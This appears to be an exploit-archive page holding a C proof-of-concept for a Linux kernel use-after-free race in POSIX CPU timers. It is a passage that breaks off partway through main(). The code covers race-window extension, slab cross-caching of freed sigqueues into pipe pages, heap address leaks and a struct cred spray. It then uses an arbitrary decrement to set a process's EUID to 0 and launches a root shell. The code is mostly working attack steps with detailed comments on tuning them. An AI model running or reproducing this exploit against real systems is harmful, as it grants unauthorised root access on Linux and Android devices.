4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.c C
#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>
#include <sys/signalfd.h>
#include <poll.h>
#include <errno.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/mman.h>
#include <linux/futex.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define SYSCHK(x) ({            \
    typeof(x) __res = (x);      \
    if (__res == (typeof(x))-1) \
      err(1, "SYSCHK(" #x ")"); \
    __res;                      \
})

#define PAGE_SIZE 0x1000uLL

// For winning the races and extending
// the race windows
#define NUM_SAMPLES 100000
#define NUM_TIMERS 18
#define ONE_MS_NS 1000000uLL
#define SYSCALL_LOOP_TIMES_MAX 300
#define EPOLL_COUNT 500
#define SFD_DUP_COUNT 100

// For synchronization between parent and child
#define SUCCESS_CHAR 's'
#define FAIL_CHAR 'f'
#define SUCCESS_STR "s"
#define FAIL_STR "f"

// The following variables are target dependent. Some benchmarking can
// be done from userland beforehand so that these variables aren't
// needed, but just for this exploit, I manually set them to values
// that work for me. You'll have to figure them out yourself.
#define PARENT_SETTIME_DELAY_US 22000
#define PARENT_SETTIME_DELAY_US_DELTA 50
#define CPU_USAGE_THRESHOLD 22000

/* Global variables for exploit setup START */

// Thread synchronization in child process
pthread_barrier_t barrier;

// Timers used to stall `handle_posix_cpu_timers()` to extend the race window
timer_t stall_timers[NUM_TIMERS];

// Thread that will trigger the timer handling, and also the thread that will
// be reaped by the exploit parent process
pthread_t race_thread;

int exploit_child_to_parent[2];
int exploit_parent_to_child[2];
int sigusr1_sfds[SFD_DUP_COUNT]; // signalfd for increasing race window
int sigusr2_sfds[SFD_DUP_COUNT]; // signalfd for detecting the UAF later.

// Amount of LESS times to loop the `getpid()` syscall to waste CPU time
int syscall_loop_times = 0;
int race_retry_count = 0; // For debugging purposes
pid_t exploit_child_pid, exploit_parent_pid;

// BIG NOTE: The very first timer created by a process actually gets timer ID 0,
// so checking for NULL here is not good enough to figure out whether a timer was
// allocated or not.
//
// Instead, set these to -1, and check for -1 later.
timer_t uaf_timer = (void *) -1, realloc_timer = (void *) -1; // The UAF timer handlers

/* Global variables for exploit setup END */

/* Global variables for cross-cache START */

// `sigqueue_cachep` related constants.
#define SIGQUEUE_objs_per_slab 51
#define SIGQUEUE_cpu_partial 30
#define SIGQUEUE_slab_count 33
#define SIGQUEUE_obj_size 80

// `struct sigqueue` related constants.
#define SIGQUEUE_PREALLOC 1
#define SIGQUEUE_list_next_offset 0
#define SIGQUEUE_list_prev_offset 8
#define SIGQUEUE_info_si_signo_offset (24+0)
#define SIGQUEUE_flags_offset 16
#define SIGQUEUE_user_offset 72

// `cred_jar` and `struct cred` related constants.
#define CRED_JAR_slab_size 192
#define CRED_JAR_euid_offset 20
#define CRED_JAR_egid_offset 24

// This list holds the timers used for cross-caching (both times).
timer_t cross_cache_timers[SIGQUEUE_slab_count][SIGQUEUE_objs_per_slab];

/* Global variables for cross-cache END */

/* Global variables for second stage START */

#define NUM_CRED_PROCS 1000 // Number of processes to spray `struct cred` objects with

int parent_owns_uaf_sigqueue = 0; // Does the parent or child have the UAF sigqueue?
pid_t buggy_pid = 0; // Parent / child process PID based on above

/* Global variables for second stage END */

void pin_on_cpu(int i) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(i, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}

static inline long long ts_to_ns(const struct timespec *ts) {
    return (long long)ts->tv_sec * 1000000000LL + (long long)ts->tv_nsec;
}

// Helper function to fully drain a signalfd.
//
// WARNING!!!! THIS FUNCTION IS AI GENERATED!!! DO NOT USE XD
int drain_signalfd(int sfd) {
    int sig_count = 0;
    for (;;) {
        struct signalfd_siginfo si;
        ssize_t n = read(sfd, &si, sizeof(si));
        if (n > 0) { sig_count++; continue; }    // drained some; keep going
        if (n == -1 && errno == EAGAIN) break;   // fully drained
        if (n == -1 && errno == EINTR) continue; // interrupted; retry
    }

    return sig_count;
}

static inline size_t rdtsc_begin(void)
{
#if defined(ARM64)
  return rdtsc();
#else
  size_t a, d;
  asm volatile ("mfence");
  asm volatile ("rdtsc" : "=a" (a), "=d" (d));
  a = (d<<32) | a;
  asm volatile ("lfence");
  return a;
#endif
}

static inline size_t rdtsc_end(void)
{
#if defined(ARM64)
  return rdtsc();
#else
  size_t a, d;
  asm volatile ("lfence");
  asm volatile ("rdtsc" : "=a" (a), "=d" (d));
  a = (d<<32) | a;
  asm volatile ("mfence");
  return a;
#endif
}

// This function measures the average CPU time consumption of the `getpid()` syscall.
//
// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine.
//
// Can also actually return 0 if some weird scheduler behavior occurs and causes
// the `total_nsec` to overflow, so ensure to check for that when calling it.
//
// Also, very important to be pinned to one CPU before running this!
long int getpid_cpu_usage() {
    size_t (*times)[2] = malloc(NUM_SAMPLES * sizeof(size_t[2]));
    
    for (int i = 0; i < NUM_SAMPLES; i++) {
        times[i][0] = rdtsc_begin();
        syscall(__NR_getpid);
        times[i][1] = rdtsc_end();
    }

    size_t total_nsec = 0;
    for (int i = 0; i < NUM_SAMPLES; i++) {
        total_nsec += times[i][1] - times[i][0];
    }

    free(times);
    long int getpid_avg = total_nsec / NUM_SAMPLES;
    return total_nsec / NUM_SAMPLES;
}

// Helper function to read from the reallocated pipe buffer data page.
//
// Reads `size` bytes at offset `offset` out of the pipe and return it in `buf`.
//
// NOTES: 
// - `buf` is assumed to be at least PAGE_SIZE bytes large.
// - The pipe is assumed to be readable (i.e write_pipe() was
//   already called before this).
void read_pipe(int pfds[2], size_t size, size_t offset, char *buf) {
    size_t ret = 0;

    if (size > PAGE_SIZE) {
        printf("read_pipe: size too big\n");
        SYSCHK(-1);
    }

    // Read up to offset first, then read size bytes
    ret = SYSCHK(read(pfds[0], buf, offset));
    if (ret != offset) {
        printf("read_pipe: offset read failed, offset %ld read %ld\n", offset, ret);
        SYSCHK(-1);
    }
    SYSCHK(read(pfds[0], buf, size));
}

// Helper function to read from the reallocated pipe buffer data page.
//
// Writes `size` bytes out of `buf` into the pipe at offset `offset`.
//
// NOTES:
// - `buf` is assumed to be at least PAGE_SIZE bytes large.
// - This will clobber all data before offset.
// TODO:
void write_pipe(int pfds[2], size_t size, size_t offset, void *buf) {
    size_t ret = 0;
    if (size > PAGE_SIZE) {
        printf("write_pipe: size too big\n");
        SYSCHK(-1);
    }

    // Write up to offset first, then write the data
    char zero_buf[offset];
    memset(zero_buf, 0, offset);
    ret = SYSCHK(write(pfds[1], zero_buf, offset));
    if (ret != offset) {
        printf("write_pipe: offset write failed, offset %ld wrote %ld\n", offset, ret);
        SYSCHK(-1);
    }

    ret = SYSCHK(write(pfds[1], buf, size));
    if (ret != size) {
        printf("write_pipe: size write failed, size %ld wrote %ld\n", size, ret);
        SYSCHK(-1);
    }
}

// This function pre-allocates sigqueues very carefully for cross-caching (both times).
//
// NOTE: Ensure you are on the correct CPU before calling this function!
void sigqueue_crosscache_preallocs() {
    // ---------------------------------------------------------------------------------
    // 
    // NOTE: On a real android device, a bunch of sigqueues should be allocated first
    // so that all slab pages from per cpu partial lists, per node partial lists, etc
    // are used up. This can be done by just spamming real-time signals to some process
    // that's blocking them.
    //
    // I won't be doing that here, just going to assume this is being ran in QEMU on a
    // clean setup where the sigqueue cache's slab pages will not be on any per-cpu
    // or per-node partial lists.
    //
    // ---------------------------------------------------------------------------------
    //
    // Goal: get our UAF timer in the middle of slab 3.
    struct sigevent cross_cache_evt = {0};
    cross_cache_evt.sigev_notify = SIGEV_NONE;
    
    // Allocate full slabs 1 and 2.
    for (int i = 0; i < 2; i++) {
        for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
            SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j]));
        }
    }

    // Allocate 25 objects in slab 3
    for (int i = 0; i < 25; i++) {
        SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i]));
    }
    
    // Next allocation will be the sigqueue whose slab will be cross-cached.
}

// This function post-allocates sigqueues very carefully for cross-caching (both times).
//
// NOTE: Ensure you are on the correct CPU before calling this function!
void sigqueue_crosscache_postallocs() {
    struct sigevent cross_cache_evt = {0};
    cross_cache_evt.sigev_notify = SIGEV_NONE;

    // We have a freed sigqueue at the head of the freelist of slab 3 right now. Re-allocate
    // it plus the remaining 25 objects in that slab now.
    //
    // You can use this special value with a kernel patch to figure out where it's allocated.
    // This should reallocate on top of whatever sigqueue we are attempting to cross-cache. If
    // it doesn't, there's a bug in this exploit!
    // cross_cache_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL;
    SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][25]));
    cross_cache_evt.sigev_value.sival_ptr = (void *)0; // reset if it was set
    
    // Allocate the remaining 25 objects in slab 3.
    for (int i = 26; i < SIGQUEUE_objs_per_slab; i++) {
        SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i]));
    }

    // Allocate sigqueues for the remaining slabs.
    for (int i = 3; i < SIGQUEUE_slab_count; i++) {
        for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
            SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j]));
        }
    }
}

// This function frees the slab 3 page back to the page allocator by very
// carefully freeing sigqueues in the `cross_cache_timers` list.
void free_crosscache_sigqueues() {
    // Now, the target sigqueue should be in the middle of slab 3.
    //
    // Strategically free sigqueues to fill up the per-cpu partial list, but also
    // ensure that the target sigqueue's slab is fully freed before freeing the 32nd slab.
    //
    // Start by freeing the first and last object in slab 1.
    SYSCHK(timer_delete(cross_cache_timers[0][0]));
    SYSCHK(timer_delete(cross_cache_timers[0][SIGQUEUE_objs_per_slab-1]));

    // Now, free the first, and then objects 26 through 51 in slab 2.
    SYSCHK(timer_delete(cross_cache_timers[1][0]));
    for (int i = 25; i < SIGQUEUE_objs_per_slab; i++) {
        SYSCHK(timer_delete(cross_cache_timers[1][i]));
    }

    // Free all objects in slab 3
    for (int i = 0; i < SIGQUEUE_objs_per_slab; i++) {
        SYSCHK(timer_delete(cross_cache_timers[2][i]));
    }

    // Free objects 1 through 25 in slab 4
    for (int i = 0; i < 25; i++) {
        SYSCHK(timer_delete(cross_cache_timers[3][i]));
    }

    // For the remaining slabs up to `cpu_partial` (inclusive), free the first and last obj
    for (int i = 4; i < SIGQUEUE_cpu_partial+1; i++) {
        SYSCHK(timer_delete(cross_cache_timers[i][0]));
        SYSCHK(timer_delete(cross_cache_timers[i][SIGQUEUE_objs_per_slab-1]));
    }

    // Now, freeing one object from the `cpu_partial+1`th slab should trigger
    // `unfreeze_partials()`, which will move fully freed slabs (i.e slab 3) to
    // the page allocator. 
    //
    // Free first and last sigqueue here just in case the first one is in the 
    // slab overlapped with the previous index.
    SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][0]));
    SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][SIGQUEUE_objs_per_slab-1]));
}

void cleanup_crosscache_sigqueues() {
    // In this case, we can just timer_delete() every single timer without
    // checking for errors. If they exist, they will be deleted. Otherwise,
    // we'll see an error.
    for (int i = 0; i < SIGQUEUE_slab_count; i++) {
        for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
            timer_delete(cross_cache_timers[i][j]);
        }
    }
}

// This is the function responsible for triggering `handle_posix_cpu_timers()`.
void race_func(void) {
    // Pin to same CPU as the `free_func()` thread. This is the first cross-cache
    // CPU.
    pin_on_cpu(3);

    // For the race condition trigger
    struct sigevent race_evt = {0};
    race_evt.sigev_notify = SIGEV_SIGNAL;
    race_evt.sigev_signo = SIGUSR1;

    // For the UAF timer
    struct sigevent uaf_evt = {0};
    uaf_evt.sigev_notify = SIGEV_SIGNAL;
    uaf_evt.sigev_signo = SIGUSR1; // SIGUSR1 for now
    // uaf_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // Detect this UAF timer

    prctl(PR_SET_NAME, "RACER");
    // prctl(PR_SET_NAME, "REAPEE"); // KERNEL PATCH: 500ms delay with this

    // Send this thread's TID to the parent process, so the parent can attach to us.
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(exploit_child_to_parent[1], &tid, sizeof(pid_t))); // sync 1

    // Get the average CPU time usage of the `getpid()` syscall, so we
    // can use it for the trigger later
    long int getpid_avg = 0;

    // `getpid_cpu_usage()` can technically return 0, it's very rare but
    // if it does, just recalculate.
    while (getpid_avg == 0) {
        getpid_avg = getpid_cpu_usage();
    }

    // Wait for parent to attach and continue us.
    pthread_barrier_wait(&barrier); // barrier 1

    // Create the UAF timer on the first cross-cache CPU.
    //
    // NOTE: This must be the last timer created on this CPU's active slab! Because we will
    //       free it and re-allocate over it in `free_func()`.
    SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &uaf_evt, &uaf_timer));

    // Switch the pinned CPU after creating the UAF timer. This is important because
    // `free_func()` must be able to run concurrently to this, and we also don't want to
    // touch the active CPU slab of the cross-cache CPU!
    pin_on_cpu(2);

    // Create the remaining stall timers for extending the race window
    for (int i = 0; i < NUM_TIMERS; i++) {
        SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &race_evt, &stall_timers[i]));
    }

    // Wait for the main thread to arm the timers. This is to make sure
    // this thread does not use CPU time to arm the timers.
    pthread_barrier_wait(&barrier); // barrier 2 - wake up main thread
    pthread_barrier_wait(&barrier); // barrier 3 - wait for armed timers

    // Waste just the right amount of CPU time now without firing any of the timers.
    //
    // The logic here is that calling `getpid()` enough times to consume 1 ms of CPU time,
    // and then adding a threshold amount of times on top of that will ensure that the timers
    // fire BEFORE `do_exit()` is called.
    //
    // Then, subtract `syscall_loop_times` (which changes on each retry) to slowly reduce the
    // amount of CPU time being consumed, until the timers fire right after `exit_notify()` wakes
    // up the parent exploit process.
    //
    // Use a print statement in `free_func()` when it receives SIGUSR1 to figure out how often
    // the timers are firing, and adjust CPU_USAGE_THRESHOLD accordingly so that it fires sometimes,
    // but not every time.
    for (int i = 0; i < ((ONE_MS_NS / getpid_avg) + CPU_USAGE_THRESHOLD - syscall_loop_times); i++) {
        syscall(__NR_getpid);
    }

    // This `return` will trigger `do_exit()` in the kernel. The goal is for a scheduler interrupt
    // to occur and `handle_posix_cpu_timers()` to run after `exit_notify()` wakes up the parent
    // exploit process that called `waitpid()` on us.
    return;
}

void free_func(void) {
    pin_on_cpu(3);
    prctl(PR_SET_NAME, "FREE_FUNC");
    
    // Set up a poll for SIGUSR1. As soon as we receive it, we know
    // we're in the race window.
    struct pollfd pfd = { 
        .fd = sigusr1_sfds[0],          
        .events = POLLIN 
    };

    // Poll for SIGUSR1.
    for (;;) {
        int ret = poll(&pfd, 1, 0);

        // Got SIGUSR1 from the first stall timer, in race window now.
        if (pfd.revents & POLLIN) {
            // Free the UAF timer now on CPU 3 (first cross-cache CPU).
            SYSCHK(timer_delete(uaf_timer));
            
            // Immediately switch pinned CPU to 0 and wake up the parent exploit process.
            //
            // Parent exploit process will already have switched to CPU 3, so it can wake
            // up immediately and re-allocate the UAF timer.
            //
            // Important to reallocate in the parent process, so that the sighand locks are
            // different.
            pin_on_cpu(0);
            SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 4.SUCCESS

            // Use the barrier to let the child process continue now and handle
            // the SIGUSR1 signals.
            pthread_barrier_wait(&barrier); // barrier 4
            break;
        }

        // Spurious wake-up check
        if (ret < 0 && errno == EINTR)
            continue;

        // Some unknown error occurred, pause to debug
        if (ret < 0) {
            perror("free_func poll");
            getchar();
            break;
        }
    }
}

// Stage 2 starts after:
//
// 1. The UAF sigqueue is freed.
// 2. We still have a handle to in either the parent or child's pending list.
// 3. The UAF sigqueue's pointers should point back to itself, making it
//    non-dequeueable by default.
void second_stage_exploit() {
    struct signalfd_siginfo si;
    char m;
    
    // Create a signalfds for all three signals we need to dequeue later.
    sigset_t mask;
    sigemptyset(&mask);
    sigaddset(&mask, SIGUSR2); // signal used by UAF sigqueue
    int sigusr2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
    sigemptyset(&mask);
    sigaddset(&mask, SIGRTMIN+1); // signal used by other sigqueue
    int sigrt1_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
    sigemptyset(&mask);
    sigaddset(&mask, SIGRTMIN+2); // signal used for leaking task pending list addr
    int sigrt2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
    
    // Prepare the buffer used by the reallocated pipe buffer data page.
    char buf[PAGE_SIZE];
    memset(buf, 0, PAGE_SIZE);

    // Just double confirm we are pinned to the right cross-cache CPU.
    pin_on_cpu(3);

    printf("\n[+] Stage 2 - Cross-cache the UAF sigqueue's slab\n");

    // Allocate the rest of the sigqueues for cross-cache
    sigqueue_crosscache_postallocs();

    // Allocate a pipe for the pipe buffer data page later, and make it
    // non-blocking for error checking too.
    int realloc_pipefds[2];
    SYSCHK(pipe(realloc_pipefds));

    // Read end non-blocking
    int flags = fcntl(realloc_pipefds[0], F_GETFL, 0);
    SYSCHK(fcntl(realloc_pipefds[0], F_SETFL, flags | O_NONBLOCK));

    // Write end non-blocking
    flags = fcntl(realloc_pipefds[1], F_GETFL, 0);
    SYSCHK(fcntl(realloc_pipefds[1], F_SETFL, flags | O_NONBLOCK));

    // Now free the UAF sigqueue's page back to the page allocator.
    free_crosscache_sigqueues();

    // Realloc UAF sigqueue as a pipe buffer page immediately after it's freed.
    // This is done by writing to the pipe.
    SYSCHK(write(realloc_pipefds[1], buf, PAGE_SIZE));

    printf("\t[+] Reallocated UAF sigqueue slab as a pipe buffer data page\n");
    printf("\t[+] Cleaning up all cross-cache allocations to prepare for next cross-cache\n");
    
    // We will be cross-caching again very soon, so free all other cross-cache sigqueues.
    // NOTE: do this on the same CPU as the first cross-cache.
    cleanup_crosscache_sigqueues();

    printf("\t[+] Preparing task pending list for heap leaks\n");

    // Switch CPUs to start on a clean slate for the second cross-cache.
    pin_on_cpu(2);

    // Do the preallocs same as before.
    sigqueue_crosscache_preallocs();

    // Send a new signal to the process to fill in the UAF sigqueue's next pointer
    // Use `tkill()` as that uses the task's pending list. `kill()` uses the
    // shared pending list instead.
    //
    // This sigqueue is allocated after the preallocs.
    SYSCHK(syscall(__NR_tkill, buggy_pid, SIGRTMIN+1));

    // Before dequeueing the SIGRTMIN+2 signal, switch back to a non-cross-cache CPU.
    //
    // This is because this signal was prepared on a non-cross-cache CPU in the first
    // place, and we aren't using it in the cross-cache, so in order to not mess with
    // the cross-cache, we have to free it on a different CPU.
    pin_on_cpu(1);

    // NOTE: If the `buggy_pid` points to the child process, we have to ask the
    //       child process to dequeue the signal for us.
    if (parent_owns_uaf_sigqueue) {
        // Dequeueing this signal will put the pointer of our task struct's pending list
        // into the ->prev pointer of the UAF sigqueue.
        SYSCHK(read(sigrt2_sfd, &si, sizeof(si)));
    } else {
        // Child will dequeue the signal for us. Wait for it to finish.
        SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 2
        SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 3
    }

    // Now switch back to the second cross-cache CPU
    pin_on_cpu(2);

    // Scan the pipe buffer data page for the `next` and `prev` pointer to store them.
    // Everything will be zeroes except those pointers at this point in time.
    read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf);
    size_t other_sigqueue_addr = 0;
    size_t task_pending_list_addr = 0;
    size_t uaf_sigqueue_offset = 0;

    // Increment by `SIGQUEUE_obj_size` and look at the `next` pointer offset.
    for (int i = 0; i < PAGE_SIZE; i += SIGQUEUE_obj_size) {
        other_sigqueue_addr = *((size_t *)(buf + (i + SIGQUEUE_list_next_offset)));

        if (other_sigqueue_addr) {
            uaf_sigqueue_offset = i;
            task_pending_list_addr = *((size_t *)(buf + (i + SIGQUEUE_list_prev_offset)));
            printf("\t[+] Heap leaks:\n");
            printf("\t\t- UAF sigqueue page offset 0x%lx\n", uaf_sigqueue_offset);
            printf("\t\t- Other sigqueue 0x%lx\n", other_sigqueue_addr);
            printf("\t\t- Task pending list addr 0x%lx\n", task_pending_list_addr);
            break;
        }
    }

    // Set up the UAF sigqueue so we can leak it's own address now.
    // Key points are:
    //
    // 1. Setting `next` and `prev` both to the other sigqueue's address ensures
    //    that the UAF sigqueue's pointer stays in the task pending list.
    // 2. `info.si_signo` must be set to SIGUSR2, otherwise the signal will not
    //     be dequeued.
    // 3. `SIGQUEUE_PREALLOC` does not technically need to be set, but I just do it anyway.
    memset(buf, 0, PAGE_SIZE);
    *((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next
    *((size_t *)(buf + SIGQUEUE_list_prev_offset)) = other_sigqueue_addr;// list->prev
    *((int *)(buf + SIGQUEUE_flags_offset)) = SIGQUEUE_PREALLOC; // flags
    *((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGUSR2; // info->si_code
    write_pipe(realloc_pipefds, SIGQUEUE_info_si_signo_offset + sizeof(int), uaf_sigqueue_offset, buf);

    // Now drain the UAF sigqueue's signal to write it's own pointers back into itself.
    // This will happen because of the `list_del_init()` in `collect_signal()`.
    //
    // NOTE: This overwrites the other sigqueue's `next` and `prev` pointers to point
    //       back to the other sigqueue's address. However, the task pending list's
    //       `prev` pointer still points to other sigqueue's address. Basically,
    //       when we free the other sigqueue soon, the task pending list's `prev`
    //       pointer won't be updated.
    //
    //       All this means is that we can't append anymore signals to this task's pending
    //       list after this point.
    //
    // NOTE: After this, SIGUSR2 is removed from the task's signal mask, but
    //       SIGRTMIN+1 stays.
    //
    // NOTE: If the `buggy_pid` points to the child process, we have to ask the
    //       child process to dequeue the signal for us.
    if (parent_owns_uaf_sigqueue) {
        SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));
    } else {
        SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 4
        SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 5
    }

    // Read the UAF sigqueue's own address now through the pipe buffer
    size_t uaf_sigqueue_addr = 0;

    read_pipe(realloc_pipefds, 8, uaf_sigqueue_offset, buf);
    uaf_sigqueue_addr = *((size_t *)(buf + SIGQUEUE_list_next_offset));

    printf("\t\t- UAF sigqueue address 0x%lx\n", uaf_sigqueue_addr);

    // Now free the other sigqueue back to the freelist of it's slab page.
    //
    // Since our UAF sigqueue is at the head of the pending list, set it's next pointer
    // to point to the other sigqueue so the list can be traversed to it.
    read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe
    *((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next
    write_pipe(realloc_pipefds, SIGQUEUE_list_next_offset + sizeof(size_t), uaf_sigqueue_offset, buf);

    // Finally, dequeue the other signal's sigqueue and free it. It's SIGRTMIN+1.
    //
    // NOTE: If the `buggy_pid` points to the child process, we have to ask the
    //       child process to dequeue the signal for us.
    if (parent_owns_uaf_sigqueue) {
        SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
    } else {
        SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 6
        SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 7
    }

    printf("\n[+] Stage 3 - Cross-cache the other sigqueue's slab\n");

    // Now, second cross-cache post allocs. The target sigqueue is the
    // other sigqueue, which was just freed.
    sigqueue_crosscache_postallocs();

    // Before freeing the other sigqueue's slab page back to the page allocator,
    // fork NUM_CRED_PROCS processes. Do this on a non-cross-cache CPU.
    //
    // This is preparing for the `struct cred` spray later.
    pin_on_cpu(1);
    printf("\t[+] Preparing %d processes for future `struct cred` spray\n", NUM_CRED_PROCS);
    int cred_parent_pfds[2];
    int cred_child_pfds[2];

    SYSCHK(pipe(cred_parent_pfds));
    SYSCHK(pipe(cred_child_pfds));

    for (int i = 0; i < NUM_CRED_PROCS; i++) {
        pid_t pid = SYSCHK(fork());

        if (!pid) {
            // child process
            SYSCHK(close(cred_parent_pfds[1]));
            SYSCHK(close(cred_child_pfds[0]));

            // Wait for the parent to wake us up to call `setresuid(-1,-1,-1)
            SYSCHK(read(cred_parent_pfds[0], &m, 1));

            // Pin on same CPU as the cross-cache CPU before calling 
            // `setresuid(-1,-1,-1)`. This allocates one cred struct.
            pin_on_cpu(2);
            SYSCHK(setresuid(-1,-1,-1));

            // Reset CPU and let the parent know we finished.
            pin_on_cpu(1);
            SYSCHK(write(cred_child_pfds[1], &m, 1));

            // Wait for the parent to potentially decrement our EUID to 0.
            SYSCHK(read(cred_parent_pfds[0], &m, 1));

            // Check our EUID
            uid_t euid = geteuid();

            // If we have root privs now, just spawn a shell
            if (euid == 0) {
                printf("\t[+] Found child process with euid=%d!\n", euid);
                printf("\t[+] Spawning root shell...\n");
                printf("\n");
                printf("\n");
                printf("\n");
                
                // Must set our UID and GID to 0 as well. "/bin/sh" seems to do a
                // `setuid(getuid())`, and since the we only changed our EUID,
                // that resets our privs here.
                setresuid(0, 0, 0);
                setresgid(0, 0, 0);
                system("/bin/sh");
            } else {
                // Parent won't wake us up anymore, wake up the parent and
                // block forever
                SYSCHK(write(cred_child_pfds[1], &m, 1));
                SYSCHK(read(cred_parent_pfds[0], &m, 1));
            }
        }
    }
    
    // Continuing in the parent process now.
    SYSCHK(close(cred_parent_pfds[0]));
    SYSCHK(close(cred_child_pfds[1]));
    
    // For later, pick the second cred object in the other sigqueue's slab arbitrarily.
    size_t target_cred_addr = (other_sigqueue_addr & ~0xfff) + CRED_JAR_slab_size;
    printf("\t[+] Target cred object to modify will be at 0x%lx\n", target_cred_addr);

    // Now free the other sigqueue's slab page, make sure to switch CPUs back to the
    // second cross-cache CPU!
    pin_on_cpu(2);
    free_crosscache_sigqueues();

    // Wake up each child process to call `setresuid(-1,-1,-1)`
    //
    // NOTE: Writing to the pipe will allocate new pages. Switch
    //       to a non-cross-cache CPU to do this.
    pin_on_cpu(1);
    for (int i = 0; i < NUM_CRED_PROCS; i++) {
        SYSCHK(write(cred_parent_pfds[1], &m, 1));
        SYSCHK(read(cred_child_pfds[0], &m, 1));
    }

    printf("\t[+] Reallocated other sigqueue's slab as a `struct cred` page\n");
    printf("\n[+] Stage 4 - Decrement EUID of target cred to 0\n");

    // At this point, SIGUSR2 will have been removed from the task's pending signal mask,
    // but SIGRTMIN+1 will still be on it. Set up the UAF sigqueue to use SIGRTMIN+1.
    //
    // Setting up the `user` pointer to `target_address - 8` gives us an arbitrary 
    // decrement primitive. Point this to the target cred's EUID offset - 8.
    read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe
    memset(buf, 0, PAGE_SIZE);
    *((size_t *)(buf + SIGQUEUE_list_next_offset)) = uaf_sigqueue_addr; // list->next
    *((size_t *)(buf + SIGQUEUE_list_prev_offset)) = uaf_sigqueue_addr;// list->prev
    *((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGRTMIN+1; // info->si_code
    *((size_t *)(buf + SIGQUEUE_user_offset)) = target_cred_addr + CRED_JAR_euid_offset - 8uLL; // user
    write_pipe(realloc_pipefds, SIGQUEUE_user_offset + sizeof(size_t), uaf_sigqueue_offset, buf);

    // Arbitrary decrement time! Decrement target cred's EUID to 0. This process
    // will have the same UID as the target cred, so we can use that to know
    // how many times to decrement.
    //
    // NOTE: If the `buggy_pid` points to the child process, we have to ask the
    //       child process to dequeue the signal for us.
    if (parent_owns_uaf_sigqueue) {
        for (int i = 0; i < getuid(); i++) {
            SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
        }
    } else {
        SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 8
        SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 9
    }

    printf("\t[+] Exploit finished. Searching for child with EUID 0...\n");

    // Now wake up each child process to check which one is root.
    // If we find the root process, we'll block forever and the child
    // can launch a shell.
    for (int i = 0; i < NUM_CRED_PROCS; i++) {
        SYSCHK(write(cred_parent_pfds[1], &m, 1));
        SYSCHK(read(cred_child_pfds[0], &m, 1));
    }

    // If we ever get here, the exploit failed for some reason.
    printf("[!!!] Exploit failed! I have no idea why XD try again?\n");
}

int main(int argc, char *argv[]) {
    // exploit process
    char m;

    // Parent and child setup
    // Use pipes to communicate between parent and child
    SYSCHK(pipe(exploit_child_to_parent));
    SYSCHK(pipe(exploit_parent_to_child));
    
    pid_t pid = SYSCHK(fork());
    
    if (pid) {
        // exploit parent process
        pin_on_cpu(0);
        close(exploit_child_to_parent[1]);
        close(exploit_parent_to_child[0]);
        
        prctl(PR_SET_NAME, "EXPLOIT_PARENT");
        
        pid_t racer_tid;
        
        // Reallocated timer event - use SIGUSR2 as it will be easy to
        // tell we won the race if we ever receive SIGUSR2 on the child thread.
        //
        // Send the signal to ourself specifically, so it uses our pending
        // list instead of the shared pending list.
        struct sigevent realloc_evt = {0};
        realloc_evt.sigev_notify = SIGEV_SIGNAL | SIGEV_THREAD_ID;
        realloc_evt.sigev_signo = SIGUSR2;
